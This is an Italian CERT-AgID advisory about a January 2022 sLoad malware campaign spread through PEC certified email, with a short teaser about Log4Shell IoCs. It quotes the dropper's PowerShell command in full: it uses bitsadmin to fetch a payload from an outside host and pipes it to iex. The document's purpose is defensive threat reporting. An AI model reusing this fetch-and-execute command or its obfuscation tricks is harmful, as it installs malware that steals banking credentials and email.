IMPORTANTE

CVE-2021-44228 IoC log4j log4shell 13/12/2021

CERT-AgID condivide gli IoC per la mitigazione degli attacchi Log4shell

(Lista IoC aggiornata al 17-01-2022 @ 10:34) Come evidenziato anche dal CSIRT Italia, la vulnerabilità censita come CVE-2021-44228 riguardante Apache Log4j sta creando notevoli problemi di sicurezza sui sistemi esposti che utilizzano quel prodotto. Il CERT-AGID, a protezione delle proprie infrastrutture e di quelle della sua constituency, sta raggruppando gli IoC (Indicatori di Compromissione) pubblici […]

Nuova campagna malware sLoad veicolata via PEC

10/01/2022

malware PEC sLoad

In data odierna il CERT-AGID, in collaborazione con i gestori di infrastrutture PEC, ha rilevato e contrastato una nuova campagna sLoad via PEC. Anche questa volta, la campagna si presenta dopo due mesi dalla precedente.

La distribuzione è iniziata a partire dalle ore 23:30 di ieri 9 gennaio 2022 con modalità quasi identiche a quelle osservate nella precedente campagna.

I destinatari delle email malevole hanno ricevuto una PEC con un allegato di tipo ZIP, con all’interno un file .PDF corrotto, un file .PNG corrotto e un file .WSF (loader).

Il file ZIP ha come nome il seguente pattern “documenti-contabili-<C.F|P.Iva>”.

Come per le campagne precedenti, il file .WSF contiene un dropper che utilizza bitsadmin per il download del payload.

Nello script è contenuto, invertito da destra a sinistra, il codice powershell per il download:

-c &"{bitsadmin /transfer NEMXAcZH https://nutrizehealth.com/cave/BRSLGU37L01G999U/first.txt %appdata%\first.txt; $zc=gc %appdata%\first.txt| Out-String; $zc -replace 'YSCxReWs|EpgNRHIF|KLWjQhXp|pbxiGTau|vTcssSR|MnYPMPoA' |iex  }"

Il codice è eseguito non invocando direttamente l’interprete powershell ma creando e poi eseguendo un collegamento a questo:

Una volta scaricato il payload (ovvero sLoad) questo viene eseguito.

sLoad si mette quindi in ascolto di comandi (ogni 40 minuti).

Le nostre evidenze suggeriscono che le finalità di sLoad siano volte all’esfiltrazione di informazioni come credenziali ed email (in particolare bancarie).

Indicatori di Compromissione

Al fine di rendere pubblici i dettagli delle campagne odierne si riportano di seguito gli indicatori rilevati:

Link: Download IoC